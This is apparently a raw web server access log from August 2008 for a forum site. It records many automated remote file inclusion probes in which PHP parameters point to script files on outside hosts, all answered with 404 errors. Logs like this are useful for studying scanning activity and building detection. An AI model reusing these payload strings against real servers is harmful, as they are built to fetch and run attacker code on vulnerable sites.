74.53.243.226 - - [25/Aug/2008:07:09:04 -0700] "GET /logs/access.log/config.php?path[docroot]=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
74.53.243.226 - - [25/Aug/2008:07:09:04 -0700] "GET /logs/config.php?path[docroot]=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
74.53.243.226 - - [25/Aug/2008:07:09:04 -0700] "GET /config.php?path[docroot]=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
217.160.176.60 - - [25/Aug/2008:07:09:25 -0700] "GET //main.php?sayfa=http://www.skilful.nu/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
89.208.43.121 - - [25/Aug/2008:07:09:39 -0700] "GET /logs/access.log/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
89.208.43.121 - - [25/Aug/2008:07:09:41 -0700] "GET /logs/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
89.208.43.121 - - [25/Aug/2008:07:09:41 -0700] "GET /errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
216.139.67.90 - - [25/Aug/2008:07:10:37 -0700] "GET /logs/access.log//index.php?abg_path=http://ecology99.freehostia.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.collegiateforum.org"
216.139.67.90 - - [25/Aug/2008:07:10:37 -0700] "GET //index.php?abg_path=http://ecology99.freehostia.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.collegiateforum.org"
216.139.67.90 - - [25/Aug/2008:07:10:37 -0700] "GET /logs//index.php?abg_path=http://ecology99.freehostia.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.collegiateforum.org"
194.114.145.73 - - [25/Aug/2008:07:10:52 -0700] "GET /logs/access.log//index.php?abg_path=http://vefhonnun.xnet.is/reikningar/users/1102783579/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
194.114.145.73 - - [25/Aug/2008:07:10:52 -0700] "GET //index.php?abg_path=http://vefhonnun.xnet.is/reikningar/users/1102783579/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
194.114.145.73 - - [25/Aug/2008:07:10:53 -0700] "GET /logs//index.php?abg_path=http://vefhonnun.xnet.is/reikningar/users/1102783579/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
89.47.236.56 - - [25/Aug/2008:07:10:57 -0700] "GET ///vwar/backup/errors.php?error=http://www.e-vanzare.ro/components/com_phpshop/shop_image/kaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.collegiateforum.org"
89.47.236.56 - - [25/Aug/2008:07:10:57 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.e-vanzare.ro/components/com_phpshop/shop_image/kaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.collegiateforum.org"
72.29.70.187 - - [25/Aug/2008:07:11:02 -0700] "GET ///vwar/backup/errors.php?error=http://www.e-vanzare.ro/components/com_phpshop/shop_image/kaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.collegiateforum.org"
72.29.70.187 - - [25/Aug/2008:07:11:02 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.e-vanzare.ro/components/com_phpshop/shop_image/kaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.collegiateforum.org"
198.66.222.121 - - [25/Aug/2008:07:11:05 -0700] "GET /logs/access.log//index.php?abg_path=http://ecology99.freehostia.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
198.66.222.121 - - [25/Aug/2008:07:11:05 -0700] "GET //index.php?abg_path=http://ecology99.freehostia.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
198.66.222.121 - - [25/Aug/2008:07:11:05 -0700] "GET /logs//index.php?abg_path=http://ecology99.freehostia.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
70.84.182.98 - - [25/Aug/2008:07:11:17 -0700] "GET ///vwar/backup/errors.php?error=http://www.e-vanzare.ro/components/com_phpshop/shop_image/kaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.collegiateforum.org"
70.84.182.98 - - [25/Aug/2008:07:11:17 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.e-vanzare.ro/components/com_phpshop/shop_image/kaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.collegiateforum.org"
66.135.41.76 - - [25/Aug/2008:07:11:17 -0700] "GET /logs/access.log//index.php?abg_path=http://ecology99.freehostia.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
66.135.41.76 - - [25/Aug/2008:07:11:17 -0700] "GET //index.php?abg_path=http://ecology99.freehostia.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
66.135.41.76 - - [25/Aug/2008:07:11:18 -0700] "GET /logs//index.php?abg_path=http://ecology99.freehostia.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
198.66.222.121 - - [25/Aug/2008:07:11:20 -0700] "GET /logs//index.php?abg_path=http://ecology99.freehostia.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
198.66.222.121 - - [25/Aug/2008:07:11:20 -0700] "GET //index.php?abg_path=http://ecology99.freehostia.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
89.208.43.121 - - [25/Aug/2008:07:11:32 -0700] "GET /logs/access.log/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
89.208.43.121 - - [25/Aug/2008:07:11:32 -0700] "GET /logs/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
89.208.43.121 - - [25/Aug/2008:07:11:34 -0700] "GET /errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
89.249.18.10 - - [25/Aug/2008:07:11:36 -0700] "GET /logs//index.php?abg_path=http://ecology99.freehostia.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
89.249.18.10 - - [25/Aug/2008:07:11:36 -0700] "GET //index.php?abg_path=http://ecology99.freehostia.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
89.249.18.10 - - [25/Aug/2008:07:11:40 -0700] "GET /logs/access.log//index.php?abg_path=http://ecology99.freehostia.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
89.249.18.10 - - [25/Aug/2008:07:11:41 -0700] "GET //index.php?abg_path=http://ecology99.freehostia.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
89.249.18.10 - - [25/Aug/2008:07:11:41 -0700] "GET /logs//index.php?abg_path=http://ecology99.freehostia.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
67.18.151.242 - - [25/Aug/2008:07:11:46 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://www.adithosting.com/store/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
67.18.151.242 - - [25/Aug/2008:07:11:46 -0700] "GET ///vwar/backup/errors.php?error=http://www.adithosting.com/store/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
67.18.151.242 - - [25/Aug/2008:07:11:46 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.adithosting.com/store/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
74.53.243.226 - - [25/Aug/2008:07:11:47 -0700] "GET /logs/access_080121.log%20/admin_modules/admin_module_delimage.inc.php?config[path_src_include]=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
74.53.243.226 - - [25/Aug/2008:07:11:47 -0700] "GET /admin_modules/admin_module_delimage.inc.php?config[path_src_include]=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
74.53.243.226 - - [25/Aug/2008:07:11:47 -0700] "GET /logs/admin_modules/admin_module_delimage.inc.php?config[path_src_include]=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
62.149.232.117 - - [25/Aug/2008:07:12:01 -0700] "GET /logs/access_080526.log/index.php?conteudo=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
67.18.151.242 - - [25/Aug/2008:07:12:05 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://www.adithosting.com/store/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
67.18.151.242 - - [25/Aug/2008:07:12:05 -0700] "GET ///vwar/backup/errors.php?error=http://www.adithosting.com/store/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
67.18.151.242 - - [25/Aug/2008:07:12:05 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.adithosting.com/store/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
66.135.41.76 - - [25/Aug/2008:07:12:25 -0700] "GET /logs//index.php?abg_path=http://ecology99.freehostia.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
66.135.41.76 - - [25/Aug/2008:07:12:26 -0700] "GET //index.php?abg_path=http://ecology99.freehostia.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
89.208.43.121 - - [25/Aug/2008:07:12:34 -0700] "GET /logs/access_080324.log/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.208.43.121 - - [25/Aug/2008:07:12:34 -0700] "GET /errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.208.43.121 - - [25/Aug/2008:07:12:34 -0700] "GET /logs/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.108.67.123 - - [25/Aug/2008:07:12:58 -0700] "GET /logs/access.log//index.php?abg_path=http://ecology99.freehostia.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.collegiateforum.org"
89.108.67.123 - - [25/Aug/2008:07:12:58 -0700] "GET //index.php?abg_path=http://ecology99.freehostia.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.collegiateforum.org"
89.108.67.123 - - [25/Aug/2008:07:12:58 -0700] "GET /logs//index.php?abg_path=http://ecology99.freehostia.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.collegiateforum.org"
89.208.43.121 - - [25/Aug/2008:07:13:01 -0700] "GET /errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
74.53.243.226 - - [25/Aug/2008:07:13:01 -0700] "GET /logs/access_080324.log/config.php?path[docroot]=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
89.208.43.121 - - [25/Aug/2008:07:13:02 -0700] "GET /logs/access_080324.log/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.208.43.121 - - [25/Aug/2008:07:13:02 -0700] "GET /logs/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
83.168.219.74 - - [25/Aug/2008:07:13:32 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.bestofipl.com/media/images/gallery/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
83.168.219.74 - - [25/Aug/2008:07:13:32 -0700] "GET /logs/access_080211.log//tools/send_reminders.php?noSet=0&includedir=http://www.bestofipl.com/media/images/gallery/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
83.168.219.74 - - [25/Aug/2008:07:13:32 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.bestofipl.com/media/images/gallery/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
83.168.219.74 - - [25/Aug/2008:07:13:32 -0700] "GET /logs/access_080121.log//tools/send_reminders.php?noSet=0&includedir=http://www.bestofipl.com/media/images/gallery/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.108.67.123 - - [25/Aug/2008:07:13:51 -0700] "GET /logs//index.php?abg_path=http://ecology99.freehostia.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.collegiateforum.org"
89.108.67.123 - - [25/Aug/2008:07:13:51 -0700] "GET //index.php?abg_path=http://ecology99.freehostia.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.collegiateforum.org"
89.47.236.56 - - [25/Aug/2008:07:13:56 -0700] "GET ///vwar/backup/errors.php?error=http://www.e-vanzare.ro/components/com_phpshop/shop_image/kaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "collegiateforum.org"
89.47.236.56 - - [25/Aug/2008:07:13:56 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.e-vanzare.ro/components/com_phpshop/shop_image/kaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "collegiateforum.org"
62.149.232.117 - - [25/Aug/2008:07:13:57 -0700] "GET //index.php?abg_path=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
62.149.232.117 - - [25/Aug/2008:07:13:57 -0700] "GET /logs/access.log//index.php?abg_path=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
62.149.232.117 - - [25/Aug/2008:07:13:59 -0700] "GET /logs//index.php?abg_path=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.185.237.191 - - [25/Aug/2008:07:14:04 -0700] "GET /logs/access_080128.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://spiritualcultivation.com/modules/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
64.185.237.191 - - [25/Aug/2008:07:14:04 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://spiritualcultivation.com/modules/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
64.185.237.191 - - [25/Aug/2008:07:14:04 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://spiritualcultivation.com/modules/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
72.29.70.187 - - [25/Aug/2008:07:14:41 -0700] "GET ///vwar/backup/errors.php?error=http://www.e-vanzare.ro/components/com_phpshop/shop_image/kaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "collegiateforum.org"
72.29.70.187 - - [25/Aug/2008:07:14:42 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.e-vanzare.ro/components/com_phpshop/shop_image/kaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "collegiateforum.org"
62.149.232.117 - - [25/Aug/2008:07:14:48 -0700] "GET //index.php?abg_path=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.53.243.226 - - [25/Aug/2008:07:15:03 -0700] "GET /logs/access_080121.log/admin_modules/admin_module_delimage.inc.php?config[path_src_include]=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
74.53.243.226 - - [25/Aug/2008:07:15:04 -0700] "GET /logs/access_080128.log/admin_modules/admin_module_delimage.inc.php?config[path_src_include]=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
64.185.237.191 - - [25/Aug/2008:07:15:20 -0700] "GET /logs/access_080324.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://spiritualcultivation.com/modules/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
70.84.182.98 - - [25/Aug/2008:07:15:38 -0700] "GET ///vwar/backup/errors.php?error=http://www.e-vanzare.ro/components/com_phpshop/shop_image/kaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "collegiateforum.org"
70.84.182.98 - - [25/Aug/2008:07:15:38 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.e-vanzare.ro/components/com_phpshop/shop_image/kaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "collegiateforum.org"
194.114.145.73 - - [25/Aug/2008:07:15:59 -0700] "GET /logs/access_080128.log/index.php?inc=http://vefhonnun.xnet.is/reikningar/users/1102783579/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
194.114.145.73 - - [25/Aug/2008:07:16:00 -0700] "GET /index.php?inc=http://vefhonnun.xnet.is/reikningar/users/1102783579/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
194.114.145.73 - - [25/Aug/2008:07:16:00 -0700] "GET /logs/index.php?inc=http://vefhonnun.xnet.is/reikningar/users/1102783579/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
62.149.232.117 - - [25/Aug/2008:07:16:21 -0700] "GET /logs/access.log//index.php?abg_path=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
62.149.232.117 - - [25/Aug/2008:07:16:21 -0700] "GET //index.php?abg_path=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
62.149.232.117 - - [25/Aug/2008:07:16:21 -0700] "GET /logs//index.php?abg_path=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
195.199.190.37 - - [25/Aug/2008:07:16:49 -0700] "GET /logs/access.log//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
62.149.232.117 - - [25/Aug/2008:07:16:49 -0700] "GET /logs/access.log//index.php?abg_path=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
62.149.232.117 - - [25/Aug/2008:07:16:53 -0700] "GET //index.php?abg_path=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
62.149.232.117 - - [25/Aug/2008:07:16:54 -0700] "GET /logs//index.php?abg_path=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
195.199.190.37 - - [25/Aug/2008:07:16:54 -0700] "GET /logs/access.log//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
85.214.88.11 - - [25/Aug/2008:07:17:02 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
85.214.88.11 - - [25/Aug/2008:07:17:02 -0700] "GET ///vwar/backup/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
85.214.88.11 - - [25/Aug/2008:07:17:03 -0700] "GET /logs///vwar/backup/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
70.84.182.98 - - [25/Aug/2008:07:17:22 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://poko.club.hu/id1.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
70.84.182.98 - - [25/Aug/2008:07:17:23 -0700] "GET ///vwar/backup/errors.php?error=http://poko.club.hu/id1.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
70.84.182.98 - - [25/Aug/2008:07:17:23 -0700] "GET /logs///vwar/backup/errors.php?error=http://poko.club.hu/id1.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
82.78.216.197 - - [25/Aug/2008:07:17:29 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://poko.club.hu/id8.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
82.78.216.197 - - [25/Aug/2008:07:17:29 -0700] "GET ///vwar/backup/errors.php?error=http://poko.club.hu/id8.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
82.78.216.197 - - [25/Aug/2008:07:17:29 -0700] "GET /logs///vwar/backup/errors.php?error=http://poko.club.hu/id8.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
82.78.216.197 - - [25/Aug/2008:07:17:34 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
82.78.216.197 - - [25/Aug/2008:07:17:34 -0700] "GET ///vwar/backup/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
82.78.216.197 - - [25/Aug/2008:07:17:34 -0700] "GET /logs///vwar/backup/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
200.93.147.155 - - [25/Aug/2008:07:18:13 -0700] "GET /logs/access.log//index.php?abg_path=http://ecology99.freehostia.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
200.93.147.155 - - [25/Aug/2008:07:18:14 -0700] "GET //index.php?abg_path=http://ecology99.freehostia.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
200.93.147.155 - - [25/Aug/2008:07:18:17 -0700] "GET /logs//index.php?abg_path=http://ecology99.freehostia.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
67.18.151.242 - - [25/Aug/2008:07:18:27 -0700] "GET ///vwar/backup/errors.php?error=http://www.adithosting.com/store/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
67.15.80.42 - - [25/Aug/2008:07:19:35 -0700] "GET /logs/access.log//index.php?abg_path=http://ecology99.freehostia.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
67.15.80.42 - - [25/Aug/2008:07:19:36 -0700] "GET //index.php?abg_path=http://ecology99.freehostia.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
67.15.80.42 - - [25/Aug/2008:07:19:37 -0700] "GET /logs//index.php?abg_path=http://ecology99.freehostia.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
74.200.206.130 - - [25/Aug/2008:07:19:41 -0700] "GET /logs/access_080428.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://leqhi.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
66.135.41.76 - - [25/Aug/2008:07:19:56 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.arisukoyu.org.tr/forum/Smileys/v6id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
66.135.41.76 - - [25/Aug/2008:07:19:56 -0700] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.arisukoyu.org.tr/forum/Smileys/v6id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
66.135.41.76 - - [25/Aug/2008:07:20:00 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.arisukoyu.org.tr/forum/Smileys/v6id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
64.22.89.194 - - [25/Aug/2008:07:20:07 -0700] "GET /logs/access_080317.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.collegiateforum.org"
64.22.89.194 - - [25/Aug/2008:07:20:07 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.collegiateforum.org"
64.22.89.194 - - [25/Aug/2008:07:20:07 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.collegiateforum.org"
212.92.23.89 - - [25/Aug/2008:07:20:09 -0700] "GET /logs///main.php?sayfa=http://www.skilful.nu/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
200.93.147.155 - - [25/Aug/2008:07:20:43 -0700] "GET /logs//index.php?abg_path=http://ecology99.freehostia.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
200.93.147.155 - - [25/Aug/2008:07:20:44 -0700] "GET //index.php?abg_path=http://ecology99.freehostia.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
67.15.80.42 - - [25/Aug/2008:07:21:07 -0700] "GET /logs//index.php?abg_path=http://ecology99.freehostia.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
67.15.80.42 - - [25/Aug/2008:07:21:08 -0700] "GET //index.php?abg_path=http://ecology99.freehostia.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
209.47.139.152 - - [25/Aug/2008:07:21:32 -0700] "GET //admin.php?vwar_root=http://free-stick-fighting.com/images/raid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
209.47.139.152 - - [25/Aug/2008:07:21:32 -0700] "GET /logs//admin.php?vwar_root=http://free-stick-fighting.com/images/raid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
209.47.139.152 - - [25/Aug/2008:07:21:34 -0700] "GET /logs/access_080324.log//admin.php?vwar_root=http://free-stick-fighting.com/images/raid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
74.53.243.226 - - [25/Aug/2008:07:21:34 -0700] "GET /config.php?path[docroot]=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
